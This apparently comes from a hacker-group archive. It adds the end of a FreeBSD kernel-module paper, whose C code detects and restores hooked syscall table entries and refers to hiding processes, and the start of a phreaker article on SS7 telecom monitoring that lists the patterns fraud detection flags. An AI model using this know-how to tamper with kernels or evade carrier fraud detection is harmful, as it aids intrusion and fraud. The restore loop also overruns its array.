+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ char error[400];
+ int counter;
+
+ bzero(&error, sizeof(error)); 
+
+ /*this is hard cut & paste coding :-)*/
+ if (sysent[SYS_exit].sy_call!=exit) error[SYS_exit]=1;
+ if (sysent[SYS_fork].sy_call!=fork) error[SYS_fork]=1;
+ if (sysent[SYS_read].sy_call!=read) error[SYS_read]=1;
+ if (sysent[SYS_write].sy_call!=write) error[SYS_write]=1;
+ if (sysent[SYS_open].sy_call!=open) error[SYS_open]=1;
+ if (sysent[SYS_close].sy_call!=close) error[SYS_close]=1;
+ if (sysent[SYS_wait4].sy_call!=wait4) error[SYS_wait4]=1;
+ if (sysent[SYS_link].sy_call!=link) error[SYS_link]=1;
+ if (sysent[SYS_unlink].sy_call!=unlink) error[SYS_unlink]=1;
+ if (sysent[SYS_chdir].sy_call!=chdir) error[SYS_chdir]=1; 
+ if (sysent[SYS_fchdir].sy_call!=fchdir) error[SYS_fchdir]=1;
+ if (sysent[SYS_mknod].sy_call!=mknod) error[SYS_mknod]=1;
+ if (sysent[SYS_chmod].sy_call!=chmod) error[SYS_chmod]=1;
+ if (sysent[SYS_chown].sy_call!=chown) error[SYS_chown]=1;
+ if (sysent[SYS_break].sy_call!=obreak) error[SYS_break]=1;
+ if (sysent[SYS_getfsstat].sy_call!=getfsstat) error[SYS_getfsstat]=1;
+ if (sysent[SYS_lseek].sy_call!=lseek) error[SYS_lseek]=1;
+ if (sysent[SYS_getpid].sy_call!=getpid) error[SYS_getpid]=1;
+ if (sysent[SYS_mount].sy_call!=mount) error[SYS_mount]=1;
+ if (sysent[SYS_unmount].sy_call!=unmount) error[SYS_unmount]=1;
+ if (sysent[SYS_setuid].sy_call!=setuid) error[SYS_setuid]=1; 
+ if (sysent[SYS_getuid].sy_call!=getuid) error[SYS_getuid]=1;
+ if (sysent[SYS_geteuid].sy_call!=geteuid) error[SYS_geteuid]=1;
+ if (sysent[SYS_ptrace].sy_call!=ptrace) error[SYS_ptrace]=1;
+ if (sysent[SYS_recvmsg].sy_call!=recvmsg) error[SYS_recvmsg]=1;
+ if (sysent[SYS_sendmsg].sy_call!=sendmsg) error[SYS_sendmsg]=1;
+ if (sysent[SYS_recvfrom].sy_call!=recvfrom) error[SYS_recvfrom]=1;
+ if (sysent[SYS_accept].sy_call!=accept) error[SYS_accept]=1;
+ if (sysent[SYS_getpeername].sy_call!=getpeername) error[SYS_getpeername]=1;
+ if (sysent[SYS_getsockname].sy_call!=getsockname) error[SYS_getsockname]=1;
+ if (sysent[SYS_access].sy_call!=access) error[SYS_access]=1;
+ if (sysent[SYS_chflags].sy_call!=chflags) error[SYS_chflags]=1; 
+ if (sysent[SYS_fchflags].sy_call!=fchflags) error[SYS_fchflags]=1;
+ if (sysent[SYS_sync].sy_call!=sync) error[SYS_sync]=1;
+ if (sysent[SYS_kill].sy_call!=kill) error[SYS_kill]=1;
+ if (sysent[SYS_stat].sy_call!=stat) error[SYS_stat]=1;
+ if (sysent[SYS_lstat].sy_call!=lstat) error[SYS_lstat]=1;
+ if (sysent[SYS_dup].sy_call!=dup) error[SYS_dup]=1;
+ if (sysent[SYS_pipe].sy_call!=pipe) error[SYS_pipe]=1;
+ if (sysent[SYS_getegid].sy_call!=getegid) error[SYS_getegid]=1;
+ if (sysent[SYS_profil].sy_call!=profil) error[SYS_profil]=1;
+ if (sysent[SYS_ktrace].sy_call!=ktrace) error[SYS_ktrace]=1;
+ if (sysent[SYS_sigaction].sy_call!=sigaction) error[SYS_sigaction]=1; 
+ if (sysent[SYS_getgid].sy_call!=getgid) error[SYS_getgid]=1;
+ if (sysent[SYS_sigprocmask].sy_call!=sigprocmask) error[SYS_sigprocmask]=1;
+ if (sysent[SYS_getlogin].sy_call!=getlogin) error[SYS_getlogin]=1;
+ if (sysent[SYS_setlogin].sy_call!=setlogin) error[SYS_setlogin]=1;
+ if (sysent[SYS_acct].sy_call!=acct) error[SYS_acct]=1;
+ if (sysent[SYS_sigpending].sy_call!=sigpending) error[SYS_sigpending]=1;
+ if (sysent[SYS_sigaltstack].sy_call!=sigaltstack) error[SYS_sigaltstack]=1;
+ if (sysent[SYS_ioctl].sy_call!=ioctl) error[SYS_ioctl]=1;
+ if (sysent[SYS_reboot].sy_call!=reboot) error[SYS_reboot]=1;
+ if (sysent[SYS_revoke].sy_call!=revoke) error[SYS_revoke]=1;
+ if (sysent[SYS_symlink].sy_call!=symlink) error[SYS_symlink]=1; 
+ if (sysent[SYS_readlink].sy_call!=readlink) error[SYS_readlink]=1;
+ if (sysent[SYS_execve].sy_call!=execve) error[SYS_execve]=1;
+ if (sysent[SYS_umask].sy_call!=umask) error[SYS_umask]=1;
+ if (sysent[SYS_chroot].sy_call!=chroot) error[SYS_chroot]=1;
+ if (sysent[SYS_fstat].sy_call!=fstat) error[SYS_fstat]=1;
+ if (sysent[SYS_msync].sy_call!=msync) error[SYS_msync]=1;
+ if (sysent[SYS_vfork].sy_call!=vfork) error[SYS_vfork]=1;
+ if (sysent[SYS_sbrk].sy_call!=sbrk) error[SYS_sbrk]=1;
+ if (sysent[SYS_sstk].sy_call!=sstk) error[SYS_sstk]=1;
+ if (sysent[SYS_vadvise].sy_call!=ovadvise) error[SYS_vadvise]=1;
+ if (sysent[SYS_munmap].sy_call!=munmap) error[SYS_munmap]=1;
+ if (sysent[SYS_mprotect].sy_call!=mprotect) error[SYS_mprotect]=1;
+ if (sysent[SYS_madvise].sy_call!=madvise) error[SYS_madvise]=1;
+ if (sysent[SYS_mincore].sy_call!=mincore) error[SYS_mincore]=1;
+ if (sysent[SYS_getgroups].sy_call!=getgroups) error[SYS_getgroups]=1;
+ if (sysent[SYS_setgroups].sy_call!=setgroups) error[SYS_setgroups]=1;
+ if (sysent[SYS_getpgrp].sy_call!=getpgrp) error[SYS_getpgrp]=1;
+ if (sysent[SYS_setpgid].sy_call!=setpgid) error[SYS_setpgid]=1;
+ if (sysent[SYS_setitimer].sy_call!=setitimer) error[SYS_setitimer]=1;
+ if (sysent[SYS_swapon].sy_call!=swapon) error[SYS_swapon]=1;
+ if (sysent[SYS_getitimer].sy_call!=getitimer) error[SYS_getitimer]=1;
+ if (sysent[SYS_getdtablesize].sy_call!=getdtablesize)
+     error[SYS_getdtablesize]=1;  
+  if (sysent[SYS_dup2].sy_call!=dup2) error[SYS_dup2]=1;
+ if (sysent[SYS_fcntl].sy_call!=fcntl) error[SYS_fcntl]=1;
+ if (sysent[SYS_select].sy_call!=select) error[SYS_select]=1;
+ if (sysent[SYS_fsync].sy_call!=fsync) error[SYS_fsync]=1;
+ if (sysent[SYS_setpriority].sy_call!=setpriority) error[SYS_setpriority]=1;
+ if (sysent[SYS_socket].sy_call!=socket) error[SYS_socket]=1;
+ if (sysent[SYS_connect].sy_call!=connect) error[SYS_connect]=1;
+ if (sysent[SYS_accept].sy_call!=accept) error[SYS_accept]=1;
+ if (sysent[SYS_getpriority].sy_call!=getpriority) error[SYS_getpriority]=1;
+ if (sysent[SYS_sigreturn].sy_call!=sigreturn) error[SYS_sigreturn]=1;
+ if (sysent[SYS_bind].sy_call!=bind) error[SYS_bind]=1;
+ if (sysent[SYS_setsockopt].sy_call!=setsockopt) error[SYS_setsockopt]=1;
+ if (sysent[SYS_listen].sy_call!=listen) error[SYS_listen]=1;
+ if (sysent[SYS_gettimeofday].sy_call!=gettimeofday) error[SYS_gettimeofday]=1;
+ if (sysent[SYS_getrusage].sy_call!=getrusage) error[SYS_getrusage]=1;
+ if (sysent[SYS_getsockopt].sy_call!=getsockopt) error[SYS_getsockopt]=1;
+ if (sysent[SYS_sigreturn].sy_call!=sigreturn) error[SYS_sigreturn]=1;
+ if (sysent[SYS_readv].sy_call!=readv) error[SYS_readv]=1;
+ if (sysent[SYS_writev].sy_call!=writev) error[SYS_writev]=1;
+ if (sysent[SYS_settimeofday].sy_call!=settimeofday) error[SYS_settimeofday]=1;
+ if (sysent[SYS_fchown].sy_call!=fchown) error[SYS_fchown]=1;
+ if (sysent[SYS_fchmod].sy_call!=fchmod) error[SYS_fchmod]=1;
+ if (sysent[SYS_recvfrom].sy_call!=recvfrom) error[SYS_recvfrom]=1;
+ if (sysent[SYS_setreuid].sy_call!=setreuid) error[SYS_setreuid]=1;
+ if (sysent[SYS_setregid].sy_call!=setregid) error[SYS_setregid]=1;
+ if (sysent[SYS_rename].sy_call!=rename) error[SYS_rename]=1; 
+ if (sysent[SYS_truncate].sy_call!=truncate) error[SYS_truncate]=1;
+ if (sysent[SYS_ftruncate].sy_call!=ftruncate) error[SYS_ftruncate]=1;
+ if (sysent[SYS_flock].sy_call!=flock) error[SYS_flock]=1;
+ if (sysent[SYS_mkfifo].sy_call!=mkfifo) error[SYS_mkfifo]=1;
+ if (sysent[SYS_sendto].sy_call!=sendto) error[SYS_sendto]=1;
+ if (sysent[SYS_shutdown].sy_call!=shutdown) error[SYS_shutdown]=1;
+ if (sysent[SYS_socketpair].sy_call!=socketpair) error[SYS_socketpair]=1;
+ if (sysent[SYS_mkdir].sy_call!=mkdir) error[SYS_mkdir]=1;
+ if (sysent[SYS_rmdir].sy_call!=rmdir) error[SYS_rmdir]=1;
+ if (sysent[SYS_utimes].sy_call!=utimes) error[SYS_utimes]=1;
+ if (sysent[SYS_adjtime].sy_call!=adjtime) error[SYS_adjtime]=1;
+ if (sysent[SYS_getpeername].sy_call!=getpeername) error[SYS_getpeername]=1;
+ if (sysent[SYS_getrlimit].sy_call!=getrlimit) error[SYS_getrlimit]=1;
+ if (sysent[SYS_setrlimit].sy_call!=setrlimit) error[SYS_setrlimit]=1;
+ if (sysent[SYS_quotactl].sy_call!=quotactl) error[SYS_quotactl]=1;
+ if (sysent[SYS_statfs].sy_call!=statfs) error[SYS_statfs]=1;
+ if (sysent[SYS_fstatfs].sy_call!=fstatfs) error[SYS_fstatfs]=1;
+ if (sysent[SYS_getdomainname].sy_call!=getdomainname)
+     error[SYS_getdomainname]=1;  
+ if (sysent[SYS_setdomainname].sy_call!=setdomainname)
+     error[SYS_setdomainname]=1;  
+ if (sysent[SYS_uname].sy_call!=uname) error[SYS_uname]=1;  
+ if (sysent[SYS_sysarch].sy_call!=sysarch) error[SYS_sysarch]=1;   
+ if (sysent[SYS_rtprio].sy_call!=rtprio) error[SYS_rtprio]=1;  
+ if (sysent[SYS_semsys].sy_call!=semsys) error[SYS_semsys]=1;  
+ if (sysent[SYS_msgsys].sy_call!=msgsys) error[SYS_msgsys]=1;  
+ if (sysent[SYS_shmsys].sy_call!=shmsys) error[SYS_shmsys]=1;  
+ if (sysent[SYS_setgid].sy_call!=setgid) error[SYS_setgid]=1;  
+ if (sysent[SYS_setegid].sy_call!=setegid) error[SYS_setegid]=1;  
+ if (sysent[SYS_seteuid].sy_call!=seteuid) error[SYS_seteuid]=1;  
+ if (sysent[SYS_stat].sy_call!=stat) error[SYS_stat]=1;  
+ if (sysent[SYS_fstat].sy_call!=fstat) error[SYS_fstat]=1;  
+ if (sysent[SYS_lstat].sy_call!=lstat) error[SYS_lstat]=1;  
+ if (sysent[SYS_pathconf].sy_call!=pathconf) error[SYS_pathconf]=1;  
+ if (sysent[SYS_fpathconf].sy_call!=fpathconf) error[SYS_fpathconf]=1;  
+ if (sysent[SYS_getrlimit].sy_call!=getrlimit) error[SYS_getrlimit]=1;  
+ if (sysent[SYS_setrlimit].sy_call!=setrlimit) error[SYS_setrlimit]=1;  
+ if (sysent[SYS_getdirentries].sy_call!=getdirentries) 
+    error[SYS_getdirentries]=1; 
+ if (sysent[SYS_mmap].sy_call!=mmap) error[SYS_mmap]=1;  
+ if (sysent[SYS_lseek].sy_call!=lseek) error[SYS_lseek]=1;  
+ if (sysent[SYS_truncate].sy_call!=truncate) error[SYS_truncate]=1;  
+ if (sysent[SYS_ftruncate].sy_call!=ftruncate) error[SYS_ftruncate]=1;  
+ if (sysent[SYS___sysctl].sy_call!=__sysctl) error[SYS___sysctl]=1;  
+ if (sysent[SYS_mlock].sy_call!=mlock) error[SYS_mlock]=1;  
+ if (sysent[SYS_munlock].sy_call!=munlock) error[SYS_munlock]=1;  
+ if (sysent[SYS_undelete].sy_call!=undelete) error[SYS_undelete]=1;  
+ if (sysent[SYS_futimes].sy_call!=futimes) error[SYS_futimes]=1;  
+ if (sysent[SYS_getpgid].sy_call!=getpgid) error[SYS_getpgid]=1;  
+ if (sysent[SYS_poll].sy_call!=poll) error[SYS_poll]=1;  
+ if (sysent[SYS___semctl].sy_call!=__semctl) error[SYS___semctl]=1;  
+ if (sysent[SYS_semget].sy_call!=semget) error[SYS_semget]=1;  
+ if (sysent[SYS_semop].sy_call!=semop) error[SYS_semop]=1;  
+ if (sysent[SYS_semconfig].sy_call!=semconfig) error[SYS_semconfig]=1;  
+ if (sysent[SYS_msgctl].sy_call!=msgctl) error[SYS_msgctl]=1;  
+ if (sysent[SYS_msgsnd].sy_call!=msgsnd) error[SYS_msgsnd]=1; 
+ if (sysent[SYS_msgrcv].sy_call!=msgrcv) error[SYS_msgrcv]=1;  
+ if (sysent[SYS_shmat].sy_call!=shmat) error[SYS_shmat]=1;  
+ if (sysent[SYS_shmctl].sy_call!=shmctl) error[SYS_shmctl]=1;  
+ if (sysent[SYS_shmdt].sy_call!=shmdt) error[SYS_shmdt]=1;  
+ if (sysent[SYS_shmget].sy_call!=shmget) error[SYS_shmget]=1;  
+ if (sysent[SYS_clock_gettime].sy_call!=clock_gettime) 
+     error[SYS_clock_gettime]=1; 
+ if (sysent[SYS_clock_settime].sy_call!=clock_settime) 
+    error[SYS_clock_settime]=1;
+ if (sysent[SYS_clock_getres].sy_call!=clock_getres) 
+    error[SYS_clock_getres]=1; 
+ if (sysent[SYS_nanosleep].sy_call!=nanosleep) error[SYS_nanosleep]=1;  
+ if (sysent[SYS_minherit].sy_call!=minherit) error[SYS_minherit]=1;  
+ if (sysent[SYS_rfork].sy_call!=rfork) error[SYS_rfork]=1;  
+ if (sysent[SYS_openbsd_poll].sy_call!=openbsd_poll) 
+    error[SYS_openbsd_poll]=1;  
+ if (sysent[SYS_issetugid].sy_call!=issetugid) 
+   error[SYS_issetugid]=1;  
+ if (sysent[SYS_lchown].sy_call!=lchown) error[SYS_lchown]=1;  
+ if (sysent[SYS_getdents].sy_call!=getdents) error[SYS_getdents]=1; 
+ if (sysent[SYS_lchmod].sy_call!=lchmod) error[SYS_lchmod]=1;
+ if (sysent[SYS_lutimes].sy_call!=lutimes) error[SYS_lutimes]=1;
+ if (sysent[SYS_modnext].sy_call!=modnext) error[SYS_modnext]=1;
+ if (sysent[SYS_modstat].sy_call!=modstat) error[SYS_modstat]=1;
+ if (sysent[SYS_modfnext].sy_call!=modfnext) error[SYS_modfnext]=1;
+ if (sysent[SYS_modfind].sy_call!=modfind) error[SYS_modfind]=1;
+ if (sysent[SYS_kldload].sy_call!=kldload) error[SYS_kldload]=1;
+ if (sysent[SYS_kldunload].sy_call!=kldunload) error[SYS_kldunload]=1;
+ if (sysent[SYS_kldfind].sy_call!=kldfind) error[SYS_kldfind]=1;
+ if (sysent[SYS_kldnext].sy_call!=kldnext) error[SYS_kldnext]=1;
+ if (sysent[SYS_kldstat].sy_call!=kldstat) error[SYS_kldstat]=1;
+ if (sysent[SYS_kldfirstmod].sy_call!=kldfirstmod) error[SYS_kldfirstmod]=1;
+ if (sysent[SYS_getsid].sy_call!=getsid) error[SYS_getsid]=1;
+ if (sysent[SYS_aio_return].sy_call!=aio_return) error[SYS_aio_return]=1;
+ if (sysent[SYS_aio_suspend].sy_call!=aio_suspend) error[SYS_aio_suspend]=1;
+ if (sysent[SYS_aio_cancel].sy_call!=aio_cancel) error[SYS_aio_cancel]=1;
+ if (sysent[SYS_aio_error].sy_call!=aio_error) error[SYS_aio_error]=1;
+ if (sysent[SYS_aio_read].sy_call!=aio_read) error[SYS_aio_read]=1;
+ if (sysent[SYS_aio_write].sy_call!=aio_write) error[SYS_aio_write]=1;
+ if (sysent[SYS_lio_listio].sy_call!=lio_listio) error[SYS_lio_listio]=1;
+ if (sysent[SYS_yield].sy_call!=yield) error[SYS_yield]=1;
+ if (sysent[SYS_thr_sleep].sy_call!=thr_sleep) error[SYS_thr_sleep]=1;
+ if (sysent[SYS_thr_wakeup].sy_call!=thr_wakeup) error[SYS_thr_wakeup]=1;
+ if (sysent[SYS_mlockall].sy_call!=mlockall) error[SYS_mlockall]=1;
+ if (sysent[SYS_munlockall].sy_call!=munlockall) error[SYS_munlockall]=1;
+ if (sysent[SYS___getcwd].sy_call!=__getcwd) error[SYS___getcwd]=1;
+ if (sysent[SYS_sched_setparam].sy_call!=sched_setparam)
+     error[SYS_sched_setparam]=1;
+ if (sysent[SYS_sched_getparam].sy_call!=sched_getparam)
+     error[SYS_sched_getparam]=1;
+ if (sysent[SYS_sched_setscheduler].sy_call!=sched_setscheduler)
+     error[SYS_sched_setscheduler]=1;
+ if (sysent[SYS_sched_getscheduler].sy_call!=sched_getscheduler)
+     error[SYS_sched_getscheduler]=1;
+ if (sysent[SYS_sched_yield].sy_call!=sched_yield)
+     error[SYS_sched_yield]=1;
+ if (sysent[SYS_sched_get_priority_max].sy_call!=sched_get_priority_max)
+     error[SYS_sched_get_priority_max]=1;
+ if (sysent[SYS_sched_get_priority_min].sy_call!=sched_get_priority_min)
+     error[SYS_sched_get_priority_min]=1;
+ if (sysent[SYS_sched_rr_get_interval].sy_call!=sched_rr_get_interval)
+     error[SYS_sched_rr_get_interval]=1;
+ if (sysent[SYS_utrace].sy_call!=utrace)
+     error[SYS_utrace]=1;
+ if (sysent[SYS_sendfile].sy_call!=sendfile)
+     error[SYS_sendfile]=1;
+ if (sysent[SYS_kldsym].sy_call!=kldsym)
+     error[SYS_kldsym]=1;
+ printf("RESULTS : Modified System Calls \n\n");
+ printf("number   new-addr\n");
+ printf("------   --------\n");
+ for (counter=0; counter <=399; counter++)
+ if (error[counter]==1)
+  printf("%d       %p\n", counter, sysent[counter].sy_call);
+ return 0;
+}
+                                                   
+        
+static moduledata_t syscall_mod = {
+ "SysentChecker", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+</xmp>  
+Nice code, isn't it :). Well I did not have the time, to write a nice wrapper.
+So this is just the plain idea filled in a module. <br>
+The idea : Every system call entry (sysent) has a function member (sy_call) as
+you know. In order to modify or intercept a system call a hacker has to change
+this address pointing to his own function. So we only have to check these
+addreesses against the system functions (like write for the SYS_write system
+call) to check the system.<br>
+Average hackers will be stopped with this way of checking system
+integrity, gurus won't (you can insert code without changing the system call
+table, I'm working on this at the moment -> look for further releases).
+
+<p>
+<H3><A NAME="III.2."></A>2. How to restore old system calls</h3>
+<p>    
+After detecting a changed system call table it is a good idea to restore the
+original one. <br>
+I dont't present you the best solution : Start a module on system startup,
+copy all sysent fields into another sysent array. If you want to restore every
+sysent just copy the saved list to the modified sysent list.
+
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <sys/lock.h>
+
+#define MAX_SYSCALL_NUM 337
+
+struct sysent save_sysent[MAX_SYSCALL_NUM];
+
+void restoresys(struct proc *p)
+{
+ int counter;
+ printf("RESTORE\n");
+ for (counter=0; counter<=MAX_SYSCALL_NUM; counter++)
+  sysent[counter]=save_sysent[counter];
+}
+
+
+static struct sysent restoresys_sysent = {
+ 0,
+ restoresys
+};
+
+/*
+ * The function called at load/unload.
+ */
+static int
+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ int counter;
+ if (cmd==MOD_LOAD)
+ { for (counter=0; counter<=MAX_SYSCALL_NUM; counter++)
+   save_sysent[counter]=sysent[counter];
+  sysent[210]=restoresys_sysent;
+ }
+ return 0;
+}
+                                                   
+         
+static moduledata_t syscall_mod = {
+ "SysentRestore", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+</xmp>
+
+This module should be loaded at system startup (the best would be loading it
+before the first connect to the 'hostile' net). Of course, you should add
+hiding features to this module. This will also prevent hackers from easily
+manipulate your own sysent restore list.
+
+<p>
+<H3><A NAME="III.3."></A>3. General ideas for using MD5 Hashes </h3>
+<p>
+Ok the latter two sections explained how to detect and repair the damage any
+hostile module could do, but what about prevention.
+My Linux article used a passworded createmodule() system call. This time
+you could catch kldload() in order to check the module. Note : I'm not sure
+at the moment, but I think catching this system call is not enough, I think
+it's possible to load a module without the kldstuff; just an idea.<br>
+This time we could use a MD5 hash (digest). The function (macros) we need are
+explained in the MD5 man page (section 9). Take a look at those function and
+you'll recognize how easy it is to implement. These macros help us to get a
+digest on a module someone wants to load on our system. You only have to hard
+code some hashes into your kernel for checking the loaded ones. The rest
+should be clear.
+
+<p>
+<H3><A NAME="III.4."></A>4. How to see a hidden process</h3>
+<p>
+As I said in part I of this paper every process is saved in the allproc
+list which consists of lots of proc structure each holding one process running
+on the system. I also said that it's impossible to delete a process from thist
+list (scheduling, timing, etc.) so we patched the sysctl system call to hide a
+certain process. <br>
+This means that we could write some kernel code (module) which will print the
+whole allproc list including the process to hide. The code for this module
+was already shown in I.7.1.
+
+<p>
+<H3><A NAME="III.5."></A>5. Last words</h3>
+<p>
+Every idea mentioned in this part will stop most (!!) attacks on your system
+via kernel modules. Of course, you have to handle things like reboots etc. for
+making everything a bit more secure.<br>
+BUT any person who really knows the kernel and the system will easily work
+around those protections schemes... Bear in mind : It's always harder to
+secure a system than to hack it.
+
+<p>
+<H3><A NAME="IV."></A>IV. Last things to mention</h3>
+<p>
+<p>
+<H3><A NAME="IV.1."></A>1. What about OpenBSD and NetBSD</h3>
+<p>
+
+At the moment I have no running OpenBSD or NetBSD system, but I took a very
+brief look at the OpenBSD kernel. It uses the LKM scheme FreeBSD also used in
+former releases. The rest of the kernel is very similar to FreeBSD, so I think
+there should be no big problems porting the modules in this text to OpenBSD or
+NetBSD. THC will work on this, but I really can't tell when we are finished...
+
+<p>
+<H3><A NAME="IV.2."></A>2. Resources</h3>
+<p>
+<p>
+<b>[Internet]</b>
+<p>
+http://www.freebsd.org : everything you need<br>
+http://www.thc.org   : THC Homepage (Linux LKM article and lots of more!)<br>
+<p>
+<p>
+<b>[books]</b>
+<p>
+'The Design and Implementation of the 4.4BSD Operating System' (Addison
+Wesley) : One of the best books I know, a bit old but still useful.
+
+<p>
+<H3><A NAME="IV.3."></A>3. Greetings</h3>
+<p>
+<i>groups</i> :<br>
+<b>THC, ADM, ech0, deep, CCC</b><br>
+<p>
+<i>personal</i> : <br>
+<b>van Hauser</b><br>
+-> thanks for the idea to write this article; and for answering lots of
+questions :)<br>
+<b>Stealth</b><br>
+-> I got your mails :) ext2 fs text is really nice<br> 
+<b>mindmaniac</b><br> 
+-> again a big thanks for starting the whole thing...<br> 
+<b>Solar Designer</b><br> 
+-> there's only one word for you : *ELITE*. The next release will deal with the
+other kernel stuff, perhaps I'll need some help ;)<br>         
+<b>Aleph1</b><br> 
+-> what would the world be without bugtraq<br> 
+</BODY>
+</HTML>

Papers/c7-monit.txt

@@ -0,0 +1,150 @@
+
+
+
+
+                          CCiTT #7 Monitoring
+
+
+
+
+
+   The information presented here is based on Data of :
+
+        þ Bellcore (Bell Communication Research) - USA
+        þ Mercury Communications - United Kingdom
+        þ Telekom - Germany
+        þ AcceSS 7 - Hewlett Packard Research CCiTT #7 Monitoring System
+
+
+Note that some of the data presented in this article might be
+classified material by some of those companies. 
+
+
+
+
+
+ What is CCiTT #7
+ ----------------
+CCiTT #7 is the newest signalling system also called SS7 (or also Common
+Channel Signalling No.7). It uses two channels for communication. 
+The first is the voice channel (or what ever you are transmitting over it) 
+and the second is the data channel. This data channels is completly seperated
+from the voice channel and holds all calling information in it plus has got
+the advanced features of caller ID, call forwarding, conference calling, 
+credit card calls, collect calls etc.
+This extra data channel was put in since ccitt #6 because first it disables
+now the "famous" blueboxing possiblity, second enhances line quality and
+third expands possiblities for new features like caller ID etc.
+
+It is used in nearly all west european countries, but now more and more
+other countries change to this system as well like israel for example.
+
+
+
+
+
+
+
+ Monitoring Systems for CCiTT #7
+ -------------------------------
+As far as i know the following Monitoring Systems are in existance and 
+available for telecommunication companies :
+
+   þ Bellcore : Davin and NetMavin
+   þ Hewlett Packard : HP E4250A, also known as AcceSS 7
+   þ Unisys : NIRIS Information Platform
+   þ Algen : Probe
+
+þ Bellcore's monitoring system is based on unix and is programmed in C using
+  the X11 Unix Window System but can also be run on vt100 terminals and soon
+  on Macintoshs too. It can run on any workstation which is Unix compactible.
+  It has got also the possbility to work with data from other 
+  Monitoring Systems like AcceSS 7 from HP and also use the C libraries from
+  HP's system. 
+  It's easy to use with mouse support, Window graphic displays in realtime,
+  Zooming etc.
+
+  Interesting Options are for example : 
+     Monitoring calls from a specific telephone number
+     Automatic Fraud Detection
+     Multiple simultaneos call traced (up to 100)
+  Bellcore's Davin and NetMavin is used by Bell and Mercury Telecommunication.
+
+
+þ Hewlett Packards monitoring system is more general than Bellcore's. 
+  It's based on HP unix machines (Apollos I think) running HPUX Unix.
+  It is very flexible and can link in any CCiTT #7 system. 
+  Everything is written in C and the customer can program, enhance and tune
+  the monitoring tools as they like. Basic Tools are implemented so is the
+  monitoring data collection tools, but everything else must be programmed
+  by the customer or by an HP service team - but be sure they know what they
+  can do and will program everything to get you.
+  HP's AcceSS 7 System is used by the german Telecom.
+  (Installed in Frankfurt, Duesseldorf, Stuttgart and Nuernberg with
+   Controll Centers in Frankfurt and Bamberg)
+
+
+þ Sorry, on the two others i haven't got any information, and i don't know
+  if other monitoring systems exist.
+
+
+Of course Fraud Detection is not the main point of CCiTT #7 Monitoring.
+It's more gathering traffic statistics for network planning, optimizing,
+error controlling & detecting, and market decicions - but fraud detection
+is an important part.
+
+
+
+
+ How does CCiTT #7 Fraud Detection work
+ --------------------------------------
+Automatic Fraud Detection is based on pattern matching.
+Patterns must first be measured for each every communication network/area.
+Everything which is out of this pattern triggers an alarm.
+Out-of-Pattern are :
+   identify calls of long duration
+   repeated calls to a particular dialed number from the same area of origin
+   repeated calls from the same area of origin to different numbers
+   long/many calls from an unbillable number
+   dialing special numbers
+   dialing many toll free numbers
+
+A triggered alarm can result in anything, also depending on type of alarm :
+   saving data to log
+   continued electronical oberservation to detect more out-of-pattern behavior
+   autotrace
+   alarm operator
+
+
+ XXXXXXXXXXXXXXXX
+ XXXXXXXXXXXXXXXX \
+ XXXXXXXXXXXXXXXX  \                          
+ XXXXXXXXXXXXXXXX   \  Out-of-   -->  XXXXXXXX \   Continues        -->   XX
+ XXXXXXXXXXXXXXXX    - Pattern   -->  XXXXXXXX  -  Out-of-Pattern   -->   XX
+ XXXXXXXXXXXXXXXX   /                 XXXXXXXX /       or
+ XXXXXXXXXXXXXXXX  /                                Manual 
+ XXXXXXXXXXXXXXXX /                                Inverstigation
+ XXXXXXXXXXXXXXXX
+
+    Calls going      Monitoring       Alarms of     Continued           FRAUD
+ though Monitoring     system         Monitoring   Out-of-Pattern       CASES
+       system         Analyzing        system           or 
+                                                  Manual Investigation
+ 
+
+
+
+Yes thats all ... there aren't much information available and even those
+mentioned here are only known to a small group, although someone could
+logically think it would be this way, but now you know it for sure ;-)
+
+
+Please note that some data might be wrong or outdated (also it should not).
+If so please tell me and in the next issue I'll present the new/corrected data.
+If you got additional data, do something for the phreaker community and
+send it me to release it in the next magazine or release it on your own!
+
+
+Ciao...
+                         van Hauser
+

Papers/c7-ueber.txt

@@ -0,0 +1,267 @@
+
+
+                            CCiTT #7 Ueberwachung
+
+                                by van Hauser
+
+
+
+ Wer sich wundert : Ja, dieser Text ist schon im THC-MAG #1 erschienen.
+ Er wurde dann stark erweitert und erschien dann im Time-For-a-Change
+ Magazin #4. Aus aktuellem Anlass, darunter, dass dieses Magazin #4 in
+ Deutsch erscheint, wurde der Artikel uebersetzt und noch etwas erweitert,
+ dafuer alle nicht-deutsch-spezifischen Informationen entfernt.
+
+
+
+                               Was ist CCiTT #7
+                              ------------------
+
+ CCiTT #7 ist das neueste Signal-System, auch SS7 oder Common Channel Signaling
+ System No.7 genannt. Es ist das Protokoll, das am haeufigsten in der Welt fuer
+ Telekommunikation eingesetzt wird - wie hier in Deutschland.
+ Es benutzt 2 Kanaele fuer die Kommunikation : Der 1. ist der Sprachkanal, also
+ das, was der Kunde spricht (oder das Fax das er sendet). Der 2. Kanal ist der
+ Datenkanal. Dieser ist vollkommen separiert vom Sprachkanal und enthaelt alle
+ Gespraechsinformationen wie Rufnummer des Anrufers, Rufnummer des Angerufenen,
+ Konferenz-Option, Call-Forwarding, R-Gespraech etc. etc.
+ Dieser Datenkanal wurde seit dem CCiTT #6 separiert, da er bis #5 zum
+ sogenannten "Blueboxing" missbraucht werden konnte, ausserdem erhoehte es unter
+ anderem die Leitungsqualitaet und enthielt neue Features (Rufnummeranzeige
+ etc). Es wird mittlerweile in allen West-Europaeischen Laendern und Nord-
+ Amerika benutzt, und mehrere Laender steigen auch um, wie z.B. Israel letztes
+ Jahr.
+
+
+
+
+                Das deutsche Ueberwachungssystem fuer CCiTT #7
+               ------------------------------------------------
+
+ Seit Anfang '96 benutzt die Deutsche Telekom AG das CCiTT #7 Ueberwachungs-
+ system von Hewlett Packard, genannt AcceSS 7.
+
+
+ þ Geschichte :
+
+   Neben dem Ueberwachungssystem von Hewlett Packard gibts noch ueber 4
